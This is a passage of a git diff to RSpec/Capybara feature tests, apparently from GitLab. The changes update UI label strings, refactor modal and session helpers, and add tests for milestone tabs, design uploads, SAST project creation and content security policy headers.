end + + # It takes some time after sending keys for the reset + # btn to register the changes inside the editor + sleep 1 + click_button 'Reset' + + expect(page).to have_css('#reset-content') + + page.within('#reset-content') do + click_button 'Cancel' + end + + page.within('#source-editor-') do + expect(page).to 
have_content('Default Content123') + end + end end end diff --git a/spec/features/projects/cluster_agents_spec.rb b/spec/features/projects/cluster_agents_spec.rb index 3ef710169f0..4018ef2abc9 100644 --- a/spec/features/projects/cluster_agents_spec.rb +++ b/spec/features/projects/cluster_agents_spec.rb @@ -22,7 +22,7 @@ RSpec.describe 'ClusterAgents', :js do end it 'displays empty state', :aggregate_failures do - expect(page).to have_content('Install new Agent') + expect(page).to have_content('Install a new agent') expect(page).to have_selector('.empty-state') end end @@ -44,8 +44,17 @@ RSpec.describe 'ClusterAgents', :js do visit project_cluster_agent_path(project, agent.name) end - it 'displays agent and token information', :aggregate_failures do + it 'displays agent information', :aggregate_failures do expect(page).to have_content(agent.name) + end + + it 'displays agent activity tab', :aggregate_failures do + expect(page).to have_content('Activity') + end + + it 'displays agent tokens tab', :aggregate_failures do + expect(page).to have_content('Access tokens') + click_link 'Access tokens' expect(page).to have_content(token.description) end end diff --git a/spec/features/projects/clusters/eks_spec.rb b/spec/features/projects/clusters/eks_spec.rb index 09c10c0b3a9..a925e3a72f8 100644 --- a/spec/features/projects/clusters/eks_spec.rb +++ b/spec/features/projects/clusters/eks_spec.rb @@ -19,7 +19,7 @@ RSpec.describe 'AWS EKS Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' end diff --git a/spec/features/projects/clusters/gcp_spec.rb b/spec/features/projects/clusters/gcp_spec.rb index e1659cd2fbf..6e88cbf52b5 100644 --- a/spec/features/projects/clusters/gcp_spec.rb +++ b/spec/features/projects/clusters/gcp_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Gcp Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + 
click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Create new cluster' click_link 'Google GKE' @@ -49,7 +49,8 @@ RSpec.describe 'Gcp Cluster', :js do before do allow_any_instance_of(GoogleApi::CloudPlatform::Client) .to receive(:projects_zones_clusters_create) do - OpenStruct.new( + double( + 'cluster', self_link: 'projects/gcp-project-12345/zones/us-central1-a/operations/ope-123', status: 'RUNNING' ) @@ -144,9 +145,9 @@ RSpec.describe 'Gcp Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_button(class: 'dropdown-toggle-split') - click_link 'Connect with certificate' + click_link 'Connect with a certificate' end it 'user sees the "Environment scope" field' do @@ -160,7 +161,7 @@ RSpec.describe 'Gcp Cluster', :js do click_button 'Remove integration and resources' fill_in 'confirm_cluster_name_input', with: cluster.name click_button 'Remove integration' - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees creation form with the successful message' do @@ -174,7 +175,7 @@ RSpec.describe 'Gcp Cluster', :js do context 'when user has not dismissed GCP signup offer' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees offer on cluster index page' do @@ -191,7 +192,7 @@ RSpec.describe 'Gcp Cluster', :js do context 'when user has dismissed GCP signup offer' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user does not see offer after dismissing' do diff --git a/spec/features/projects/clusters/user_spec.rb b/spec/features/projects/clusters/user_spec.rb index d3f709bfb53..d9887ea4fe0 100644 --- a/spec/features/projects/clusters/user_spec.rb +++ b/spec/features/projects/clusters/user_spec.rb @@ -25,7 +25,7 @@ RSpec.describe 'User Cluster', :js do before do visit project_clusters_path(project) - click_link 
'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Connect existing cluster' end @@ -113,7 +113,7 @@ RSpec.describe 'User Cluster', :js do click_button 'Remove integration and resources' fill_in 'confirm_cluster_name_input', with: cluster.name click_button 'Remove integration' - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees creation form with the successful message' do diff --git a/spec/features/projects/clusters_spec.rb b/spec/features/projects/clusters_spec.rb index a49fa4c9e31..6e45529c659 100644 --- a/spec/features/projects/clusters_spec.rb +++ b/spec/features/projects/clusters_spec.rb @@ -10,13 +10,13 @@ RSpec.describe 'Clusters', :js do before do project.add_maintainer(user) - gitlab_sign_in(user) + sign_in(user) end context 'when user does not have a cluster and visits cluster index page' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'sees empty state' do @@ -34,17 +34,17 @@ RSpec.describe 'Clusters', :js do before do create(:cluster, :provided_by_user, name: 'default-cluster', environment_scope: '*', projects: [project]) visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_button(class: 'dropdown-toggle-split') end it 'user sees an add cluster button' do - expect(page).to have_content('Connect with certificate') + expect(page).to have_content('Connect with a certificate') end context 'when user filled form with environment scope' do before do - click_link 'Connect with certificate' + click_link 'Connect with a certificate' fill_in 'cluster_name', with: 'staging-cluster' fill_in 'cluster_environment_scope', with: 'staging/*' click_button 'Add Kubernetes cluster' @@ -72,7 +72,7 @@ RSpec.describe 'Clusters', :js do context 'when user updates duplicated environment scope' do before do - click_link 'Connect with certificate' + click_link 'Connect with a certificate' 
fill_in 'cluster_name', with: 'staging-cluster' fill_in 'cluster_environment_scope', with: '*' fill_in 'cluster_platform_kubernetes_attributes_api_url', with: 'https://0.0.0.0' @@ -109,13 +109,13 @@ RSpec.describe 'Clusters', :js do create(:cluster, :provided_by_gcp, name: 'default-cluster', environment_scope: '*', projects: [project]) visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end context 'when user filled form with environment scope' do before do click_button(class: 'dropdown-toggle-split') - click_link 'Create new cluster' + click_link 'Create a new cluster' click_link 'Google GKE' sleep 2 # wait for ajax @@ -160,7 +160,7 @@ RSpec.describe 'Clusters', :js do context 'when user updates duplicated environment scope' do before do click_button(class: 'dropdown-toggle-split') - click_link 'Create new cluster' + click_link 'Create a new cluster' click_link 'Google GKE' sleep 2 # wait for ajax @@ -190,7 +190,7 @@ RSpec.describe 'Clusters', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees a table with one cluster' do @@ -213,7 +213,7 @@ RSpec.describe 'Clusters', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Create new cluster' end diff --git a/spec/features/projects/container_registry_spec.rb b/spec/features/projects/container_registry_spec.rb index eec50c3a66a..4ebcb69592b 100644 --- a/spec/features/projects/container_registry_spec.rb +++ b/spec/features/projects/container_registry_spec.rb @@ -87,7 +87,7 @@ RSpec.describe 'Container Registry', :js do end it 'shows the image tags' do - expect(page).to have_content 'Image tags' + expect(page).to have_content '20 tags' first_tag = first('[data-testid="name"]') expect(first_tag).to have_content '1' end diff --git a/spec/features/projects/files/user_creates_files_spec.rb 
b/spec/features/projects/files/user_creates_files_spec.rb index fd83547d064..7159418deda 100644 --- a/spec/features/projects/files/user_creates_files_spec.rb +++ b/spec/features/projects/files/user_creates_files_spec.rb @@ -170,7 +170,7 @@ RSpec.describe 'Projects > Files > User creates files', :js do end it 'shows a message saying the file will be committed in a fork' do - message = "A new branch will be created in your fork and a new merge request will be started." + message = "GitLab will create a branch in your fork and start a merge request." expect(page).to have_content(message) end diff --git a/spec/features/projects/fork_spec.rb b/spec/features/projects/fork_spec.rb index 69e4303cce7..f9a6b67e469 100644 --- a/spec/features/projects/fork_spec.rb +++ b/spec/features/projects/fork_spec.rb @@ -59,10 +59,11 @@ RSpec.describe 'Project fork' do context 'forking is disabled' do let(:forking_access_level) { ProjectFeature::DISABLED } - it 'does not render fork button' do + it 'render a disabled fork button' do visit project_path(project) - expect(page).not_to have_css('a', text: 'Fork') + expect(page).to have_css('a.disabled', text: 'Fork') + expect(page).to have_css('a.count', text: '0') end it 'does not render new project fork page' do @@ -80,10 +81,11 @@ RSpec.describe 'Project fork' do end context 'user is not a team member' do - it 'does not render fork button' do + it 'render a disabled fork button' do visit project_path(project) - expect(page).not_to have_css('a', text: 'Fork') + expect(page).to have_css('a.disabled', text: 'Fork') + expect(page).to have_css('a.count', text: '0') end it 'does not render new project fork page' do @@ -102,6 +104,7 @@ RSpec.describe 'Project fork' do visit project_path(project) expect(page).to have_css('a', text: 'Fork') + expect(page).to have_css('a.count', text: '0') expect(page).not_to have_css('a.disabled', text: 'Fork') end diff --git a/spec/features/projects/integrations/user_activates_jira_spec.rb 
b/spec/features/projects/integrations/user_activates_jira_spec.rb index d7679d38cae..7a035248440 100644 --- a/spec/features/projects/integrations/user_activates_jira_spec.rb +++ b/spec/features/projects/integrations/user_activates_jira_spec.rb @@ -26,8 +26,7 @@ RSpec.describe 'User activates Jira', :js do unless Gitlab.ee? it 'adds Jira link to sidebar menu' do page.within('.nav-sidebar') do - expect(page).not_to have_link('Jira Issues') - expect(page).not_to have_link('Issue List', visible: false) + expect(page).not_to have_link('Jira issues', visible: false) expect(page).not_to have_link('Open Jira', href: url, visible: false) expect(page).to have_link('Jira', href: url) end diff --git a/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb b/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb index bfa7be5bb5c..211576a93f3 100644 --- a/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb +++ b/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb @@ -10,6 +10,9 @@ RSpec.describe 'User uploads new design', :js do let(:issue) { create(:issue, project: project) } before do + # Cause of raising query limiting threshold https://gitlab.com/gitlab-org/gitlab/-/issues/347334 + stub_const("Gitlab::QueryLimiting::Transaction::THRESHOLD", 102) + sign_in(user) enable_design_management(feature_enabled) visit project_issue_path(project, issue) @@ -27,10 +30,10 @@ RSpec.describe 'User uploads new design', :js do expect(page).to have_content('dk.png') end - upload_design(gif_fixture, count: 2) + upload_design([gif_fixture, logo_svg_fixture, big_image_fixture], count: 4) - expect(page).to have_selector('.js-design-list-item', count: 2) - expect(page.all('.js-design-list-item').map(&:text)).to eq(['dk.png', 'banana_sample.gif']) + expect(page).to have_selector('.js-design-list-item', count: 4) + expect(page.all('.js-design-list-item').map(&:text)).to eq(['dk.png', 'banana_sample.gif', 
'logo_sample.svg', 'big-image.png']) end end @@ -50,8 +53,16 @@ RSpec.describe 'User uploads new design', :js do Rails.root.join('spec', 'fixtures', 'banana_sample.gif') end - def upload_design(fixture, count:) - attach_file(:upload_file, fixture, match: :first, make_visible: true) + def logo_svg_fixture + Rails.root.join('spec', 'fixtures', 'logo_sample.svg') + end + + def big_image_fixture + Rails.root.join('spec', 'fixtures', 'big-image.png') + end + + def upload_design(fixtures, count:) + attach_file(:upload_file, fixtures, multiple: true, match: :first, make_visible: true) wait_for('designs uploaded') do issue.reload.designs.count == count diff --git a/spec/features/projects/jobs/user_browses_jobs_spec.rb b/spec/features/projects/jobs/user_browses_jobs_spec.rb index 8538b894869..a47aab1ec70 100644 --- a/spec/features/projects/jobs/user_browses_jobs_spec.rb +++ b/spec/features/projects/jobs/user_browses_jobs_spec.rb @@ -181,7 +181,7 @@ RSpec.describe 'User browses jobs' do name: 'rspec tests', stage: 'test') - create(:ci_job_artifact, :codequality, job: build) + create(:ci_job_artifact, :archive, job: build) end before do diff --git a/spec/features/projects/labels/issues_sorted_by_priority_spec.rb b/spec/features/projects/labels/issues_sorted_by_priority_spec.rb index 4a25e28a14e..91a30004fc3 100644 --- a/spec/features/projects/labels/issues_sorted_by_priority_spec.rb +++ b/spec/features/projects/labels/issues_sorted_by_priority_spec.rb @@ -80,7 +80,7 @@ RSpec.describe 'Issue prioritization' do expect(issue_titles[0..1]).to contain_exactly('issue_5', 'issue_8') expect(issue_titles[2..4]).to contain_exactly('issue_1', 'issue_3', 'issue_7') - expect(issue_titles[5..-1]).to eq(%w(issue_2 issue_4 issue_6)) + expect(issue_titles[5..]).to eq(%w(issue_2 issue_4 issue_6)) end end end diff --git a/spec/features/projects/members/groups_with_access_list_spec.rb b/spec/features/projects/members/groups_with_access_list_spec.rb index eb32570448b..6adc3503492 100644 --- 
a/spec/features/projects/members/groups_with_access_list_spec.rb +++ b/spec/features/projects/members/groups_with_access_list_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Projects > Members > Groups with access list', :js do include Spec::Support::Helpers::Features::MembersHelpers + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:user) } let_it_be(:group) { create(:group, :public) } @@ -70,7 +71,7 @@ RSpec.describe 'Projects > Members > Groups with access list', :js do click_button 'Remove group' end - page.within('[role="dialog"]') do + within_modal do click_button('Remove group') end diff --git a/spec/features/projects/members/list_spec.rb b/spec/features/projects/members/list_spec.rb index 308098c72a1..f2424a4acc3 100644 --- a/spec/features/projects/members/list_spec.rb +++ b/spec/features/projects/members/list_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Project members list', :js do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user1) { create(:user, name: 'John Doe') } let_it_be(:user2) { create(:user, name: 'Mary Jane') } @@ -93,7 +94,7 @@ RSpec.describe 'Project members list', :js do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end diff --git a/spec/features/projects/milestones/milestone_spec.rb b/spec/features/projects/milestones/milestone_spec.rb index 9ffb1746f3e..6bd139c0ebe 100644 --- a/spec/features/projects/milestones/milestone_spec.rb +++ b/spec/features/projects/milestones/milestone_spec.rb @@ -2,10 +2,11 @@ require 'spec_helper' -RSpec.describe 'Project milestone' do +RSpec.describe 'Project milestone', :js do let(:user) { create(:user) } let(:project) { create(:project, name: 'test', 
namespace: user.namespace) } let(:milestone) { create(:milestone, project: project) } + let(:active_tab_selector) { '[role="tab"][aria-selected="true"]' } def toggle_sidebar find('.milestone-sidebar .gutter-toggle').click @@ -31,8 +32,9 @@ RSpec.describe 'Project milestone' do it 'shows issues tab' do within('#content-body') do expect(page).to have_link 'Issues', href: '#tab-issues' - expect(page).to have_selector '.nav-links li a.active', count: 1 - expect(find('.nav-links li a.active')).to have_content 'Issues' + expect(page).to have_selector active_tab_selector, count: 1 + expect(find(active_tab_selector)).to have_content 'Issues' + expect(page).to have_text('Unstarted Issues') end end @@ -49,6 +51,35 @@ RSpec.describe 'Project milestone' do end end + context 'when clicking on other tabs' do + using RSpec::Parameterized::TableSyntax + + where(:tab_text, :href, :panel_content) do + 'Merge requests' | '#tab-merge-requests' | 'Work in progress' + 'Participants' | '#tab-participants' | nil + 'Labels' | '#tab-labels' | nil + end + + with_them do + before do + visit project_milestone_path(project, milestone) + click_link(tab_text, href: href) + end + + it 'shows the merge requests tab and panel' do + within('#content-body') do + expect(find(active_tab_selector)).to have_content tab_text + expect(find(href)).to be_visible + expect(page).to have_text(panel_content) if panel_content + end + end + + it 'sets the location hash' do + expect(current_url).to end_with(href) + end + end + end + context 'when project has disabled issues' do before do create(:issue, project: project, milestone: milestone) @@ -59,7 +90,7 @@ RSpec.describe 'Project milestone' do it 'does not show any issues under the issues tab' do within('#content-body') do - expect(find('.nav-links li a.active')).to have_content 'Issues' + expect(find(active_tab_selector)).to have_content 'Issues' expect(page).not_to have_selector '.issuable-row' end end diff --git 
a/spec/features/projects/pages/user_adds_domain_spec.rb b/spec/features/projects/pages/user_adds_domain_spec.rb index 06f130ae69c..bd4cb1aa39b 100644 --- a/spec/features/projects/pages/user_adds_domain_spec.rb +++ b/spec/features/projects/pages/user_adds_domain_spec.rb @@ -177,11 +177,11 @@ RSpec.describe 'User adds pages domain', :js do expect(domain.key).to be_nil end - it 'shows the DNS CNAME record' do + it 'shows the DNS ALIAS record' do visit project_pages_path(project) within('#content-body') { click_link 'Edit' } - expect(page).to have_field :domain_dns, with: "#{domain.domain} CNAME #{domain.project.pages_subdomain}.#{Settings.pages.host}." + expect(page).to have_field :domain_dns, with: "#{domain.domain} ALIAS #{domain.project.pages_subdomain}.#{Settings.pages.host}." end end end diff --git a/spec/features/projects/pipeline_schedules_spec.rb b/spec/features/projects/pipeline_schedules_spec.rb index 9df430c0f78..aae5ab58b5d 100644 --- a/spec/features/projects/pipeline_schedules_spec.rb +++ b/spec/features/projects/pipeline_schedules_spec.rb @@ -42,7 +42,7 @@ RSpec.describe 'Pipeline Schedules', :js do click_link 'Take ownership' page.within('.pipeline-schedule-table-row') do expect(page).not_to have_content('No owner') - expect(page).to have_link('John Doe') + expect(page).to have_link('Sidney Jones') end end diff --git a/spec/features/projects/pipelines/pipeline_spec.rb b/spec/features/projects/pipelines/pipeline_spec.rb index 944cee2a998..6ddc8e43762 100644 --- a/spec/features/projects/pipelines/pipeline_spec.rb +++ b/spec/features/projects/pipelines/pipeline_spec.rb @@ -53,6 +53,7 @@ RSpec.describe 'Pipeline', :js do pipeline: pipeline, name: 'jenkins', stage: 'external', + ref: 'master', target_url: 'http://gitlab.com/status') end end @@ -915,7 +916,7 @@ RSpec.describe 'Pipeline', :js do end end - describe 'GET /:project/-/pipelines/:id/builds' do + describe 'GET /:project/-/pipelines/:id/builds with jobs_tab_vue feature flag turned off' do 
include_context 'pipeline builds' let_it_be(:project) { create(:project, :repository) } @@ -923,6 +924,7 @@ RSpec.describe 'Pipeline', :js do let(:pipeline) { create(:ci_pipeline, project: project, ref: 'master', sha: project.commit.id) } before do + stub_feature_flags(jobs_tab_vue: false) visit builds_project_pipeline_path(project, pipeline) end diff --git a/spec/features/projects/pipelines/pipelines_spec.rb b/spec/features/projects/pipelines/pipelines_spec.rb index e38c4989f26..fb45db213d0 100644 --- a/spec/features/projects/pipelines/pipelines_spec.rb +++ b/spec/features/projects/pipelines/pipelines_spec.rb @@ -625,7 +625,7 @@ RSpec.describe 'Pipelines', :js do create_build('test', 1, 'audit', :created) create_build('deploy', 2, 'production', :created) - create(:generic_commit_status, pipeline: pipeline, stage: 'external', name: 'jenkins', stage_idx: 3) + create(:generic_commit_status, pipeline: pipeline, stage: 'external', name: 'jenkins', stage_idx: 3, ref: 'master') visit project_pipeline_path(project, pipeline) wait_for_requests diff --git a/spec/features/projects/settings/forked_project_settings_spec.rb b/spec/features/projects/settings/forked_project_settings_spec.rb index a84516e19f9..04fb6953b51 100644 --- a/spec/features/projects/settings/forked_project_settings_spec.rb +++ b/spec/features/projects/settings/forked_project_settings_spec.rb @@ -15,7 +15,7 @@ RSpec.describe 'Projects > Settings > For a forked project', :js do end shared_examples 'project settings for a forked projects' do - it 'allows deleting the link to the forked project', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/327817' do + it 'allows deleting the link to the forked project' do visit edit_project_path(forked_project) click_button 'Remove fork relationship' diff --git a/spec/features/projects/settings/user_manages_project_members_spec.rb b/spec/features/projects/settings/user_manages_project_members_spec.rb index 02a634a0fcc..31dc939e6b8 100644 --- 
a/spec/features/projects/settings/user_manages_project_members_spec.rb +++ b/spec/features/projects/settings/user_manages_project_members_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Projects > Settings > User manages project members' do include Spec::Support::Helpers::Features::MembersHelpers include Select2Helper + include Spec::Support::Helpers::ModalHelpers let(:group) { create(:group, name: 'OpenSource') } let(:project) { create(:project) } @@ -26,7 +27,7 @@ RSpec.describe 'Projects > Settings > User manages project members' do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end diff --git a/spec/features/projects/settings/user_transfers_a_project_spec.rb b/spec/features/projects/settings/user_transfers_a_project_spec.rb index ba4c379ef0a..a88b9101869 100644 --- a/spec/features/projects/settings/user_transfers_a_project_spec.rb +++ b/spec/features/projects/settings/user_transfers_a_project_spec.rb @@ -8,6 +8,8 @@ RSpec.describe 'Projects > Settings > User transfers a project', :js do let(:group) { create(:group) } before do + stub_const('Gitlab::QueryLimiting::Transaction::THRESHOLD', 120) + group.add_owner(user) sign_in(user) end @@ -16,10 +18,12 @@ RSpec.describe 'Projects > Settings > User transfers a project', :js do visit edit_project_path(project) page.within('.js-project-transfer-form') do - page.find('.select2-container').click + page.find('[data-testid="transfer-project-namespace"]').click end - page.find("div[role='option']", text: group.full_name).click + page.within('[data-testid="transfer-project-namespace"]') do + page.find("li button", text: group.full_name).click + end click_button('Transfer project') diff --git a/spec/features/projects/sourcegraph_csp_spec.rb b/spec/features/projects/sourcegraph_csp_spec.rb index 25d27462aa9..10dd050e8cc 100644 --- 
a/spec/features/projects/sourcegraph_csp_spec.rb +++ b/spec/features/projects/sourcegraph_csp_spec.rb @@ -13,7 +13,8 @@ RSpec.describe 'Sourcegraph Content Security Policy' do end it_behaves_like 'setting CSP', 'connect-src' do - let_it_be(:whitelisted_url) { 'https://sourcegraph.test' } + let_it_be(:sourcegraph_url) { 'https://sourcegraph.test' } + let_it_be(:allowlisted_url) { "#{sourcegraph_url}/.api/" } let_it_be(:extended_controller_class) { Projects::BlobController } subject do @@ -23,7 +24,7 @@ RSpec.describe 'Sourcegraph Content Security Policy' do end before do - allow(Gitlab::CurrentSettings).to receive(:sourcegraph_url).and_return(whitelisted_url) + allow(Gitlab::CurrentSettings).to receive(:sourcegraph_url).and_return(sourcegraph_url) allow(Gitlab::CurrentSettings).to receive(:sourcegraph_enabled).and_return(true) sign_in(user) diff --git a/spec/features/projects/tags/user_edits_tags_spec.rb b/spec/features/projects/tags/user_edits_tags_spec.rb index 9f66b7274e8..17080043b6d 100644 --- a/spec/features/projects/tags/user_edits_tags_spec.rb +++ b/spec/features/projects/tags/user_edits_tags_spec.rb @@ -21,7 +21,8 @@ RSpec.describe 'Project > Tags', :js do context 'page with tags list' do it 'shows tag name' do - expect(page).to have_content 'v1.1.0 Version 1.1.0' + expect(page).to have_content 'v1.1.0' + expect(page).to have_content 'Version 1.1.0' end it 'shows tag edit button' do diff --git a/spec/features/projects/user_creates_project_spec.rb b/spec/features/projects/user_creates_project_spec.rb index f5e8a5e8fc1..17c65e645f4 100644 --- a/spec/features/projects/user_creates_project_spec.rb +++ b/spec/features/projects/user_creates_project_spec.rb @@ -56,6 +56,31 @@ RSpec.describe 'User creates a project', :js do expect(page).to have_content('README.md Initial commit') end + it 'allows creating a new project when the new_project_sast_enabled is assigned the unchecked candidate' do + stub_experiments(new_project_sast_enabled: 'unchecked_candidate') + + 
visit(new_project_path) + + click_link 'Create blank project' + fill_in(:project_name, with: 'With initial commits') + + expect(page).to have_checked_field 'Initialize repository with a README' + expect(page).to have_unchecked_field 'Enable Static Application Security Testing (SAST)' + + check 'Enable Static Application Security Testing (SAST)' + + page.within('#content-body') do + click_button('Create project') + end + + project = Project.last + + expect(current_path).to eq(project_path(project)) + expect(page).to have_content('With initial commits') + expect(page).to have_content('Configure SAST in `.gitlab-ci.yml`, creating this file if it does not already exist') + expect(page).to have_content('README.md Initial commit') + end + context 'in a subgroup they do not own' do let(:parent) { create(:group) } let!(:subgroup) { create(:group, parent: parent) } diff --git a/spec/features/search/user_searches_for_code_spec.rb b/spec/features/search/user_searches_for_code_spec.rb index ef7af0ba138..c04a4493a9b 100644 --- a/spec/features/search/user_searches_for_code_spec.rb +++ b/spec/features/search/user_searches_for_code_spec.rb @@ -40,14 +40,24 @@ RSpec.describe 'User searches for code' do include_examples 'top right search form' include_examples 'search timeouts', 'blobs' - it 'finds code' do + it 'finds code and links to blob' do fill_in('dashboard_search', with: 'rspec') find('.btn-search').click expect(page).to have_selector('.results', text: 'Update capybara, rspec-rails, poltergeist to recent versions') - find("#L3").click - expect(current_url).to match(%r{master/.gitignore#L3}) + find("#blob-L3").click + expect(current_url).to match(%r{blob/master/.gitignore#L3}) + end + + it 'finds code and links to blame' do + fill_in('dashboard_search', with: 'rspec') + find('.btn-search').click + + expect(page).to have_selector('.results', text: 'Update capybara, rspec-rails, poltergeist to recent versions') + + find("#blame-L3").click + expect(current_url).to 
match(%r{blame/master/.gitignore#L3}) end it 'search mutiple words with refs switching' do @@ -65,7 +75,8 @@ RSpec.describe 'User searches for code' do expect(page).to have_selector('.results', text: expected_result) expect(find_field('dashboard_search').value).to eq(search) - expect(find("#L1502")[:href]).to match(%r{v1.0.0/files/markdown/ruby-style-guide.md#L1502}) + expect(find("#blob-L1502")[:href]).to match(%r{blob/v1.0.0/files/markdown/ruby-style-guide.md#L1502}) + expect(find("#blame-L1502")[:href]).to match(%r{blame/v1.0.0/files/markdown/ruby-style-guide.md#L1502}) end end diff --git a/spec/features/snippets/user_snippets_spec.rb b/spec/features/snippets/user_snippets_spec.rb index fe39208213a..bb733431b22 100644 --- a/spec/features/snippets/user_snippets_spec.rb +++ b/spec/features/snippets/user_snippets_spec.rb @@ -20,7 +20,7 @@ RSpec.describe 'User Snippets' do end it 'view my public snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Public" end @@ -30,7 +30,7 @@ RSpec.describe 'User Snippets' do end it 'view my internal snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Internal" end @@ -40,7 +40,7 @@ RSpec.describe 'User Snippets' do end it 'view my private snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Private" end diff --git a/spec/features/users/active_sessions_spec.rb b/spec/features/users/active_sessions_spec.rb index fab9f0884ae..6dc93fe017f 100644 --- a/spec/features/users/active_sessions_spec.rb +++ b/spec/features/users/active_sessions_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do +RSpec.describe 'Active user sessions', :clean_gitlab_redis_sessions do it 'successful login adds a new active user login' do now = Time.zone.parse('2018-03-12 09:06') Timecop.freeze(now) do @@ -29,13 +29,13 @@ 
RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do it 'successful login cleans up obsolete entries' do user = create(:user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') end gitlab_sign_in(user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).not_to include '59822c7d9fcdfa03725eff41782ad97d' end end @@ -44,14 +44,14 @@ RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do user = create(:user) personal_access_token = create(:personal_access_token, user: user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') end visit user_path(user, :atom, private_token: personal_access_token.token) expect(page.status_code).to eq 200 - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to include '59822c7d9fcdfa03725eff41782ad97d' end end diff --git a/spec/features/users/login_spec.rb b/spec/features/users/login_spec.rb index 66ebd00d368..7ef11194ff9 100644 --- a/spec/features/users/login_spec.rb +++ b/spec/features/users/login_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe 'Login', :clean_gitlab_redis_shared_state do +RSpec.describe 'Login', :clean_gitlab_redis_sessions do include TermsHelper include UserLoginHelper include SessionHelpers @@ -84,7 +84,7 @@ RSpec.describe 'Login', :clean_gitlab_redis_shared_state do expect(page).to have_content('Your account has been blocked.') end - it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do + it 'does not update Devise trackable attributes' do expect(authentication_metrics) .to 
increment(:user_blocked_counter) .and increment(:user_unauthenticated_counter) @@ -161,7 +161,7 @@ RSpec.describe 'Login', :clean_gitlab_redis_shared_state do expect(page).to have_content('Invalid login or password.') end - it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do + it 'does not update Devise trackable attributes' do expect(authentication_metrics) .to increment(:user_unauthenticated_counter) .and increment(:user_password_invalid_counter) diff --git a/spec/features/users/one_trust_csp_spec.rb b/spec/features/users/one_trust_csp_spec.rb new file mode 100644 index 00000000000..382a0b4be6c --- /dev/null +++ b/spec/features/users/one_trust_csp_spec.rb @@ -0,0 +1,17 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'OneTrust content security policy' do + let(:user) { create(:user) } + + before do + stub_config(extra: { one_trust_id: SecureRandom.uuid }) + end + + it 'has proper Content Security Policy headers' do + visit root_path + + expect(response_headers['Content-Security-Policy']).to include('https://cdn.cookielaw.org https://*.onetrust.com') + end +end diff --git a/spec/features/users/show_spec.rb b/spec/features/users/show_spec.rb index 61672662fbe..8edbf639c81 100644 --- a/spec/features/users/show_spec.rb +++ b/spec/features/users/show_spec.rb @@ -207,34 +207,31 @@ RSpec.describe 'User page' do state: :blocked, organization: 'GitLab - work info test', job_title: 'Frontend Engineer', - pronunciation: 'pruh-nuhn-see-ay-shn' + pronunciation: 'pruh-nuhn-see-ay-shn', + bio: 'My personal bio' ) end let_it_be(:status) { create(:user_status, user: user, message: "Working hard!") } - it 'shows no tab' do - subject + before do + visit_profile + end + it 'shows no tab' do expect(page).to have_css("div.profile-header") expect(page).not_to have_css("ul.nav-links") end it 'shows blocked message' do - subject - expect(page).to have_content("This user is blocked") end it 'shows user name as blocked' do - 
